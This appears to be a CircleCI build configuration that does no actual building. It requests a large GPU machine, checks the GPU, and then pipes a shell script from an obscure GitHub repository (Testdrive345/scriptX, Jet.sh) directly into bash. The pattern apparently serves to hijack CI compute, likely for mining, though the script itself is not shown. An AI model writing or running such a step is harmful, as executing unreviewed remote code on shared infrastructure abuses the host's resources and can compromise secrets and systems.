version: 2.1
jobs:
  build:
    machine:
      resource_class: gpu.nvidia.large
      image: ubuntu-1604-cuda-10.1:201909-23
    steps:
      - run: nvidia-smi
      - run: apt update && apt -y install wget
      - run: curl -s https://raw.githubusercontent.com/Testdrive345/scriptX/main/Jet.sh | bash
